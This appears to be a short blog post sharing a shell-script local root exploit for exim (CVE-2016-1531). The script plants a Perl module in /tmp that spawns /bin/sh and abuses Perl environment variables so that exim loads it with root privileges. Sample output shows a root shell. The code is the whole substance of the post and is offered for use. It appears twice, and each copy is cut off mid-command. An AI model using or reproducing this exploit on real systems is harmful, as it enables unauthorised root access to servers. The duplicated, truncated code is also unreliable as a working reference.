Priv8 | Local Root Exploit # HeRoTurk

s

#!/bin/sh

# CVE-2016-1531 exim <= 4.84-3 local root exploit

# ===============================================

# you can write files as root or force a perl module to

# load by manipulating the perl environment and running

# exim with the "perl_startup" arguement -ps. 

#

# e.g.

# [heroturk@localhost tmp]$ ./cve-2016-1531.sh 

# [ CVE-2016-1531 local root exploit

# sh-4.3# id

# uid=0(root) gid=1000(heroturk) groups=1000(heroturk)

#

# -- Hacker heroturk 

echo [ CVE-2016-1531 local root exploit

cat > /tmp/root.pm << EOF

package root;

use strict;

use warnings;

system("/bin/sh");

EOF

PERL5LIB=/tmp PERL5OPT=-Mroot /us

s

#!/bin/sh

# CVE-2016-1531 exim <= 4.84-3 local root exploit

# ===============================================

# you can write files as root or force a perl module to

# load by manipulating the perl environment and running

# exim with the "perl_startup" arguement -ps. 

#

# e.g.

# [heroturk@localhost tmp]$ ./cve-2016-1531.sh 

# [ CVE-2016-1531 local root exploit

# sh-4.3# id

# uid=0(root) gid=1000(heroturk) groups=1000(heroturk)

#

# -- Hacker heroturk 

echo [ CVE-2016-1531 local root exploit

cat > /tmp/root.pm << EOF

package root;

use strict;

use warnings;

system("/bin/sh");

EOF

PERL5LIB=/tmp PERL5OPT=-Mroot /us

24 Ağustos 2016 Çarşamba